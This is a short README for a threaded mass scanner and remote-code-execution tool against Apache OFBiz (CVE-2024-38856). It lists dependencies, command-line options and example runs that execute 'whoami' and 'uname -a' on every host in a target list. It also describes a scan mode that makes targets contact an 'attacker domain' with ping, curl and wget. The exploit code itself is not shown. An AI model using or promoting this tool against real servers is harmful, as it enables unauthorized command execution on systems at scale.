
Perform With Massive Apache OFBiz Zero-Day Scanner & RCE
This script is designed to scan for the CVE-2024-38856 vulnerability in Apache Ofbiz applications, which may allow for remote code execution. It sends HTTP POST requests to specific paths within the Ofbiz application with malicious payloads to exploit the vulnerability.

coloredlogs for color-coded, easy-to-read logsrequestscoloredlogscoloramaargparseurllib3You can install the required dependencies using pip:
pip install requests coloredlogs colorama argparse urllib3
To run the script, use the following command:
python script_name.py [options]
-t, --threads: Number of threads to use (default: 1)-p, --port: Target port-c, --command: Command to execute-s, --scan: Perform a scan with ping, curl, and wget-d, --domain: Domain (attacker domain) to scan with ping, curl, and wget-f, --file: File containing a list of targets in the format http(s)://target,portScan targets with a command:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"